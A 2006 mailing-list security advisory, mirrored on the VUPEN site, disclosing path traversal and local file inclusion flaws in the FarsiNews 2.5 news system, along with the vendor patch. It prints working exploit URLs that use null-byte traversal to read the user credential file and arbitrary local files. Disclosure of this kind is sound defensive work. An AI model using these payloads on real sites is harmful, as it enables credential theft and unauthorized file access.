|
|
|
>>
VUPEN Security / Public Mailing Lists Mirror |
Assigned : VUPEN/ADV-2006-0506
From : h e <het_ebadi at yahoo.com>
Subject : FarsiNews 2.5 Multiple Vulnerabilities
Date : 2006-02-11
Original Message
FarsiNews 2.5 Multiple Vulnerabilities
FarsiNews is a News Publishing System That uses Flat
files to store it`s Datas... Farsinews is a persian
and improved translation of CuteNews, AjFork, CuteHack
and CuteSQL...
for more information about FarsiNews Publishing System
visit http://www.farsinewsteam.com
Credit:
The information has been provided by Hamid Ebadi
( Hamid Network Security Team) : admin@hamid.ir.
The original article can be found at :
http://hamid.ir/security
Vulnerable Systems:
FarsiNews 2.5 and below (also tested on 2.1)
1)
in FarsiNews if you change the archive value :
http://localhost/index.php?archive=hamid
----------------------------[<error>]---------------------------
Warning:
file([PATH]/data/archives/hamid.news.arch.php):
failed to open stream: No such file or directory in
[PATH]\inc\shows.inc.php on line 642
Warning:
file([PATH]/data/archives/hamid.comments.arch.php):
failed to open stream: No such file or directory in
[PATH]\inc\shows.inc.php on line 686
...[and many other error]
----------------------------[</error>]---------------------------
it means that shows.inc.php try to open
'/archives/hamid.news.arch.php' (and also
'hamid.comments.arch.php') to read it's data .
we can change the archive value to
'/../users.db.php%00' to see all username and password
.
Exploit :
http://localhost/index.php?archive=/../users.db.php%00
http://localhost/Farsi1/index.php?archive=/../[file-to-read]%00
2)
Local file inclusion:
The following URL will cause local file inclusion:
http://localhost/show_archives.php?template=/../../[local-file]%00
farsinews team Patch:
use FarsiNews 2.5.3
and upgrade :
show_news.php
show_archives.php
inc/tempeditor.mdu
more info :
http://forum.farsinewsteam.com/index.php?showtopic=71
http://forum.farsinewsteam.com/index.php?showtopic=76
Disclaimer : VUPEN Security does not endorse the content of this
message submitted by others to public mailinglists. Messages submitted to public
mailinglists do not necessarily reflect the opinions or policies of VUPEN Security.
VUPEN Security makes no warranties, express or implied, as to the content of the message
in this page or the accuracy and reliability of any messages and other materials
submitted to public mailinglists. Any questions or comments regarding this page
should be sent to
team@vupen.com
|
|
|
|
|
|
Monthly Statistics |
 |
|
|
|
| |
|
Try VUPEN
VNS |
 |
|
 |
|
| |
|
 |
| |
|
|
|
|
